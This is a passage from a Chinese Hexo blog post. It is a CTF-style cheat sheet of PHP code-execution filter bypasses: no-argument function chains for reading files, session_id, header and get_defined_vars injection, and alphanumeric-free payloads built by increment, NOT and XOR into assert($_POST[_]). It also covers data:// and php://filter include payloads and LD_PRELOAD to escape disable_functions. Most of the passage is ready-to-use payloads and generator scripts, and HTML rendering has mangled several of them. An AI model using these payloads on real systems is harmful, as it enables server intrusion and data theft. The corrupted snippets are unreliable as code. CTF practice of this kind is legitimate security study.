<p><strong><strong>highlight_file(array_rand(array_flip(scandir(getcwd())))); &#x2F;&#x2F;查看和读取当前目录文件</strong><br><strong>print_r(scandir(dirname(getcwd()))); &#x2F;&#x2F;查看上一级目录的文件</strong><br><strong>print_r(scandir(next(scandir(getcwd()))));  &#x2F;&#x2F;查看上一级目录的文件</strong><br><strong>show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd()))))))); &#x2F;&#x2F;读取上级目录文件</strong><br><strong>show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));&#x2F;&#x2F;读取上级目录文件</strong><br><strong>show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));&#x2F;&#x2F;读取上级目录文件</strong><br><strong>show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));&#x2F;&#x2F;这个得爆破，不然手动要刷新很久，如果文件是正数或倒数第一个第二个最好不过了，直接定位</strong><br>  <strong>&#x2F;&#x2F;查看和读取根目录文件</strong><br>  &#x2F;&#x2F;查看和读取根目录文件</strong><br>方法二：session_id()<br> 使用条件：当请求头中有cookie时（或者走投无路手动添加cookie头也行，有些CTF题不会卡）</p>
<p> 首先我们需要开启session_start()来保证session_id()的使用，session_id可以用来获取当前会话ID，也就是说它可以抓取PHPSESSID后面的东西，但是phpsession不允许()出现</p>
<p>法一：hex2bin（）<br>我们自己手动对命令进行十六进制编码，后面在用函数hex2bin()解码转回去，使得后端实际接收到的是恶意代码。我们把想要执行的命令进行十六进制编码后，替换掉‘Cookie:PHPSESSID&#x3D;’后面的值</p>
<p>以下是十六进制编码脚本：</p>
<p><strong><?php**
**$encoded = bin2hex("phpinfo();");**
**echo $encoded;**
**?></strong><br>得到phpinfo();的十六进制编码，即706870696e666f28293b</p>
<p>那么payload就可以是：</p>
<p><strong>?参数&#x3D;eval(hex2bin(session_id(session_start())));</strong><br>同时更改cookie后的值为想执行的命令的十六进制编码</p>
<p>法二：读文件<br>例题依然是[GXYCTF2019]禁止套娃，在知道文件名为flag.php的情况下直接读文件</p>
<p>如果已知文件名，把文件名写在PHPSESSID后面，构造payload为：</p>
<p><strong>readfile(session_id(session_start()));</strong></p>
<p><img src="D:\myblog\source_posts\图片\e0cfb0b1614b4ebe1e498d3eb7be1dc5.png" alt="36c829a7c91a4487b8f0c234d2b9685f.png"></p>
<p>方法三：getallheaders()<br>getallheaders()返回当前请求的所有请求头信息，局限于Apache（apache_request_headers()和getallheaders()功能相似，可互相替代，不过也是局限于Apache）</p>
<p>当确定能够返回时，我们就能在数据包最后一行加上一个请求头，写入恶意代码，再用end()函数指向最后一个请求头，使其执行，payload：</p>
<p><strong>var_dump(end(getallheaders()));</strong><br>这里借用别人的图演示：</p>
<p><img src="D:\myblog\source_posts\图片\cef354759e2a98a3ee1d8f083684f7c8.png" alt="1261f985a4a04c2aac66a289d2034b4f.png"></p>
<p>sky是自己添加的请求头， end()指向最后一行的sky后的代码，达到phpinfo的目的，然后可以进一步去rce。</p>
<p>方法四：get_defined_vars()<br>相较于getallheaders（）更加具有普遍性，它可以回显全局变量$_GET、$_POST、$_FILES、$_COOKIE，</p>
<p>返回数组顺序为$_GET–&gt;$_POST–&gt;$_COOKIE–&gt;$_FILES</p>
<p>首先确认是否有回显：</p>
<p><strong>print_r(get_defined_vars());</strong><br>假如说原本只有一个参数a，那么可以多加一个参数b，后面写入恶意语句，payload：</p>
<p><strong>a&#x3D;eval(end(current(get_defined_vars())));&amp;b&#x3D;system(‘ls &#x2F;‘);</strong><br>把eval换成assert也行 ，能执行system(‘ls &#x2F;‘)就行</p>
<p>方法五：chdir()&amp;array_rand()赌狗读文件<br>实在无法rce，可以考虑目录遍历进行文件读取</p>
<p>利用getcwd()获取当前目录：<br><strong>var_dump(getcwd());</strong><br>结合dirname()列出当前工作目录的父目录中的所有文件和目录:</p>
<p><strong>var_dump(scandir(dirname(getcwd())));</strong><br>读上一级文件名：<br><strong>?code&#x3D;show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));</strong></p>
<p><strong>?code&#x3D;show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));</strong></p>
<p><strong>?code&#x3D;show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));</strong></p>
<p>读根目录:<br>ord() 函数和 chr() 函数：只能对第一个字符进行转码，ord() 编码，chr)解码，有概率会解码出斜杠读取根目录</p>
<p><strong>?code&#x3D;print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));</strong></p>
<p>要用chdir()固定，payload：<br> <strong>?code&#x3D;show_source(array_rand(array_flip(scandir(dirname(chdir(chr(ord(strrev(crypt(serialize(array() )))))))))));</strong></p>
<p>通过bp的intruder模块来读到根目录：</p>
<p><img src="D:\myblog\source_posts\图片\3a5510a74a3c76ab9dcea730917d6354.jpeg" alt="c4bf099b6dd94969804c321720642688.jpeg"></p>
<p><img src="D:\myblog\source_posts\图片\525664d020356da4d350ab1ce8a35867.jpeg" alt="e15e215f63914090b7091f79b3e0d09d.jpeg"></p>
<h3 id="无字母数字绕过："><a href="#无字母数字绕过：" class="headerlink" title="无字母数字绕过："></a>无字母数字绕过：</h3><p>无字母数字绕过：<br>题目标志：<br><strong>&lt;?php</strong><br><strong>if(!preg_match(‘&#x2F;[a-z0-9]&#x2F;is’,$_GET[‘shell’])) {<br>  eval($_GET[‘shell’]);</strong><br><strong>}</strong><br>解决问题的核心思路是，将非字母、数字的字符经过各种变换，最后能构造出a-z中任意一个字符。然后再利用PHP允许动态函数执行的特点，拼接处一个函数名，如“assert”，然后动态执行之即可。 </p>
<p>在此之前需要区分一下php5和php7：</p>
<p><strong>1、php5中assert是一个函数，我们可以通过$f&#x3D;’assert’;$f(…);这样的方法来动态执行任意代码。但php7中，assert不再是函数，变成了一个语言结构（类似eval），不能再作为函数名动态执行代码，所以利用起来稍微复杂一点。但也无需过于担心，比如我们利用file_put_contents函数，同样可以用来getshell。</strong></p>
<p><strong>2、php5中，是不支持($a)()这种调用方法的，但在PHP7中支持这种调用方法，因此支持这么写(‘phpinfo’)();</strong></p>
<p>自增绕过：<br><strong>“A”++ &#x3D;&#x3D;&gt; “B”</strong></p>
<p><strong>“B”++ &#x3D;&#x3D;&gt; “C”</strong></p>
<p>如果我们能够得到”A”，那么我们就能通过自增自减，得到所有的字母。<br>那么问题就转化为怎么得到一个字符”A”。在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为”Array”。再取这个字符串的第一个字母，就可以获得”A”。</p>
<p><strong>&lt;?php</strong><br><strong>$a &#x3D; ‘’.[];</strong><br><strong>var_dump($a);</strong><br> <strong>输出的会是Array</strong></p>
<p><strong>因此有payload：</strong></p>
<p><strong>&lt;?php</strong><br><strong>$<em>&#x3D;[].’’;   &#x2F;&#x2F;得到”Array”<br>$</em>__ &#x3D; $<em>[$];   &#x2F;&#x2F;得到”A”，$没有定义，默认为False也即0，此时$</em>&#x3D;”A”<br>$ &#x3D; $_;   &#x2F;&#x2F;$&#x3D;”A”</strong><br><strong>$_ &#x3D; $<em>;   &#x2F;&#x2F;$</em>&#x3D;”A”<br>$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;   &#x2F;&#x2F;得到”S”，此时$&#x3D;”S”</strong><br><strong>$_ .&#x3D; $;   &#x2F;&#x2F;$<em>&#x3D;”AS”<br>$</em> .&#x3D; $;   &#x2F;&#x2F;$_&#x3D;”ASS”</strong><br><strong>$__ &#x3D; $_;   &#x2F;&#x2F;$&#x3D;”A”<br>$++;$++;$++;$++;   &#x2F;&#x2F;得到”E”，此时$&#x3D;”E”</strong><br><strong>$_ .&#x3D; $;   &#x2F;&#x2F;$_&#x3D;”ASSE”<br>$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$;$++;   &#x2F;&#x2F;得到”R”，此时$&#x3D;”R”</strong><br><strong>$_ .&#x3D; $;   &#x2F;&#x2F;$_&#x3D;”ASSER”<br>$++;$++;   &#x2F;&#x2F;得到”T”，此时$&#x3D;”T”</strong><br><strong>$_ .&#x3D; $;   &#x2F;&#x2F;$<em>&#x3D;”ASSERT”<br>$ &#x3D; $</em>;   &#x2F;&#x2F;$&#x3D;”A”<br>$__ &#x3D; “<em>“;   &#x2F;&#x2F;$&#x3D;”</em>“<br>$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;   &#x2F;&#x2F;得到”P”，此时$&#x3D;”P”<br>$ .&#x3D; $;   &#x2F;&#x2F;$__&#x3D;”_P”</strong><br><strong>$__ &#x3D; $_;   &#x2F;&#x2F;$&#x3D;”A”<br>$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;$++;   &#x2F;&#x2F;得到”O”，此时$&#x3D;”O”</strong><br><strong>$ .&#x3D; $;   &#x2F;&#x2F;$__&#x3D;”_PO”</strong><br><strong>$++;$++;$++;$++;   &#x2F;&#x2F;得到”S”，此时$&#x3D;”S”<br>$__ .&#x3D; $;   &#x2F;&#x2F;$__&#x3D;”_POS”</strong><br><strong>$++;   &#x2F;&#x2F;得到”T”，此时$&#x3D;”T”</strong><br><strong>$ .&#x3D; $;   &#x2F;&#x2F;$__&#x3D;”_POST”</strong><br><strong>$_ &#x3D; $$;   &#x2F;&#x2F;$_&#x3D;$_POST</strong><br><strong>$<em>_<em>($</em>[_]);   &#x2F;&#x2F;ASSERT($POST[</em>])</strong></p>
<p>POST请求体传入：</p>
<p><strong>_&#x3D;phpinfo();</strong><br>取反绕过：<br>脚本：</p>
<p><strong><?php**
**$a=urlencode(~'system');**
**echo $a;**
**?></strong><br>得到的就是system取反后的结果，然后把system替换为cat &#x2F;flag得到cat &#x2F;flag的编码，最后在这两个括号(<del>)(</del>);里分别填上编码，第一个括号填system的，第二个填cat &#x2F;flag的</p>
<p>以下是system(‘cat &#x2F;flag’)的payload：</p>
<p><strong>(<del>%8C%86%8C%8B%9A%92)(</del>%9C%9E%8B%DF%D0%99%93%9E%98);</strong></p>
<p>phpinfo:（php7中）</p>
<p><strong>(~%8F%97%8F%96%91%99%90)();</strong></p>
<p>另一个payload：</p>
<p><strong>shell&#x3D;(<del>%9c%9e%93%93%a0%8a%8c%9a%8d%a0%99%8a%91%9c)(</del>%8c%86%8c%8b%9a%92,~%88%97%90%9e%92%96,’’);</strong></p>
<p>其中<del>%9c%9e%93%93%a0%8a%8c%9a%8d%a0%99%8a%91%9c是”call_user_func”，</del>%8c%86%8c%8b%9a%92是”system”，~%88%97%90%9e%92%96是”whoami”。</p>
<p>异或绕过：<br>借鉴别人的poc：</p>
<p><strong>&lt;?php**<br>**$shell &#x3D; “assert”;**<br>**$result1 &#x3D; “”;**<br>**$result2 &#x3D; “”;**<br>**for($num&#x3D;0;$num&lt;&#x3D;strlen($shell);$num++)**<br>**{**<br>    **for($x&#x3D;33;$x&lt;&#x3D;126;$x++)**<br>    **{**<br>        **if(judge(chr($x)))**<br>        **{**<br>            **for($y&#x3D;33;$y&lt;&#x3D;126;$y++)**<br>            **{**<br>                **if(judge(chr($y)))**<br>                **{**<br>                    **$f &#x3D; chr($x)^chr($y);**<br>                    **if($f &#x3D;&#x3D; $shell[$num])**<br>                    **{**<br>                        **$result1 .&#x3D; chr($x);**<br>                        **$result2 .&#x3D; chr($y);**<br>                        **break 2;**<br>                    **}**<br>                **}**<br>            **}**<br>        **}**<br>    **}**<br>**}**<br>**echo $result1;**<br>**echo “<br>“;</strong><br><strong>echo $result2;</strong></p>
<p><strong>function judge($c)</strong><br><strong>{</strong><br>    <strong>if(!preg_match(‘&#x2F;[a-z0-9]&#x2F;is’,$c))</strong><br>    <strong>{</strong><br>        <strong>return true;</strong><br>    <strong>}</strong><br>    <strong>return false;</strong><br><strong>}</strong></p>
<p>这个POC可以将”assert”变成两个字符串异或的结果。为了便于表示，生成字符串的范围我均控制为可见字符(即ASCII为33<del>126)，如果要使POC适用范围更广，可以改为0</del>126，只不过对于不可见字符，需要用url编码表示。<br>使用这个POC，我们可以得到:</p>
<p><strong>&lt;?php</strong><br><strong>$_ &#x3D; “!((%)(“^”@[[@[\“;   &#x2F;&#x2F;构造出assert</strong><br><strong>$__ &#x3D; “!+&#x2F;((“^”~{&#96;{|”;   &#x2F;&#x2F;构造出_POST</strong><br><strong>$_ &#x3D; $$;   &#x2F;&#x2F;$_ &#x3D; $<em>POST<br>$</em>($<em>[</em>]);   &#x2F;&#x2F;assert($<em>POST[</em>]);</strong><br>由于有些时候payload包括有一些特殊字符，我们需要对Payload进行一次URL编码。</p>
<h3 id="获取GET-POST参数绕过："><a href="#获取GET-POST参数绕过：" class="headerlink" title="获取GET&#x2F;POST参数绕过："></a>获取GET&#x2F;POST参数绕过：</h3><p>获取GET&#x2F;POST参数绕过：<br><strong>pyload1:?c&#x3D;include%0a$_POST[a]?&gt;</strong></p>
<p><strong>post:a&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<?php eval(system("tac flag.php"))?></strong></p>
<p><strong>pyload2：c&#x3D;include$_GET[1]?&gt;&amp;1&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php<br>pyload3: c&#x3D;include$_GET[1]?&gt;&amp;1&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,<?php system("nl flag.php")?></strong><br><strong>pyload4:c&#x3D;?&gt;<?=include$_GET[1]?>&amp;1&#x3D;php:&#x2F;&#x2F;filter&#x2F;read&#x3D;convert.base64-encode&#x2F;resource&#x3D;flag.php</strong> </p>
<h3 id="LD-PRELOAD绕过（函数很多被ban-disable-functions限制-open-basedir限制）："><a href="#LD-PRELOAD绕过（函数很多被ban-disable-functions限制-open-basedir限制）：" class="headerlink" title="LD_ PRELOAD绕过（函数很多被ban&#x2F;disable_functions限制&#x2F;open_basedir限制）："></a>LD_ PRELOAD绕过（函数很多被ban&#x2F;disable_functions限制&#x2F;open_basedir限制）：</h3><p>LD_ PRELOAD绕过（函数很多被ban&#x2F;disable_functions限制&#x2F;open_basedir限制）：<br>前置知识：程序的链接<br>静态链接: 在程序运行之前先将各个目标模块以及所需要的库函数链接成一个完整的可执行程序，之后不再拆开<br>装入时动态链接:源程序编译后所得到的一组目标模块，在装入内存时，边装入边链接。<br>运行时动态链接:原程序编译后得到的目标模块，在程序执行过程中需要用到时才对它进行链接。<br>对于动态链接来说，需要一个动态链接库，其作用在于当动态库中的函数发生变化对于可执行程序来说时透明的，可执行程序无需重新编译，方便程序的发布&#x2F;维护&#x2F;更新。<br>动态链接: 假如程序动态加载的函数是恶意的，就有可能导致disable function被绕过。</p>
<p>原理：</p>
<p>LD_PRELOAD,修改库文件,它可以影响程序的运行时的链接 (Runtime linker) ，它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。<br>通过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖正常的函数库，使用自己的或是更好的函数 (无需别人的源码)也可以向别人的程序注入恶意程序。</p>
<p>绕过条件：<br>1、能够上传自己的.so文件;<br>2、能够控制环境变量的值 (设置LD_PRELOAD变量)，比如putenv函数并且未被禁止<br>3、存在可以控制PHP启动外部程序的函数并能执行 (因为新进程启动将加载LD_PRELOAD中的.so文件)，比如mail()（php内嵌了）、imap mail()、mb send mail()和error log()等</p>
<p>这里粘贴一篇文章里的内容：</p>
<p><a href="">无需sendmail：巧用LD_PRELOAD突破disable_functions - FreeBuf网络安全行业门户</a></p>
<p>通常来说，导致 webshell 不能执行命令的原因大概有三类：一是 php.ini 中用 disable_functions 指示器禁用了 system()、exec() 等等这类命令执行的相关函数；二是 web 进程运行在 rbash 这类受限 shell 环境中；三是 WAF 拦劫。若是一则无法执行任何命令，若是二、三则可以执行少量命令。从当前现象来看，很可能由 disable_functions 所致。为验证，我利用前面的 RCE 漏洞执行 phpinfo()，确认的确如此：</p>
<p><img src="D:\myblog\source_posts\图片\581490f0d59d1adeb8f57486925f844f.jpeg" alt="2bd23f94b3a845ccaf1935cf3d399253.jpeg"></p>
<p>有四种绕过 disable_functions 的手法：第一种，攻击后端组件，寻找存在命令注入的、web 应用常用的后端组件，如，ImageMagick 的魔图漏洞、bash 的破壳漏洞；第二种，寻找未禁用的漏网函数，常见的执行命令的函数有 system()、exec()、shell_exec()、passthru()，偏僻的 popen()、proc_open()、pcntl_exec()，逐一尝试，或许有漏网之鱼；第三种，mod_cgi 模式，尝试修改 .htaccess，调整请求访问路由，绕过 php.ini 中的任何限制；第四种，利用环境变量 LD_PRELOAD 劫持系统函数，让外部程序加载恶意 *.so，达到执行系统命令的效果。</p>
<p>步骤：</p>
<p>1、生成一个我们的恶意动态链接库文件</p>
<p>2、利用putenv设置LD_PRELOAD为我们的恶意动态链接库文件的路径</p>
<p>3、配合php的某个函数去触发我们的恶意动态链接库文件</p>
<p>4、RCE并获取flag</p>
<p>蚁剑：</p>
<p><img src="D:\myblog\source_posts\图片\45bf9ecdf93ba66ecaf3afe1a6125558.jpeg" alt="123aab0ff3104ea68e775b3b43d51fb3.jpeg"></p>
<p>选择LD_PRELOAD或者PHP7_GC_UAF后点击开始，即可开始命令执行</p>
<p><img src="D:\myblog\source_posts\图片\e6a61295b9605635d97394857cb64441.jpeg" alt="46f0eae9bb194deca797c3e63725e975.jpeg"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/11/12/%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95%E5%A4%A7%E5%85%A8/" data-id="cm49k7n3l000jr4s7gi7z5sxg" data-title="" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/11/18/%E5%B8%A6%E4%BD%A0%E8%B5%B0%E8%BF%9BPHP%20session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2024/10/24/sql/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title"></div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/12/">December 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/11/">November 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/10/">October 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/12/04/%E7%BD%91%E9%BC%8E%E6%9D%AF-fillll-put/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/11/18/phpsession%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/11/18/platform/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/11/18/%E5%B8%A6%E4%BD%A0%E8%B5%B0%E8%BF%9BPHP%20session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/11/12/%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95%E5%A4%A7%E5%85%A8/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>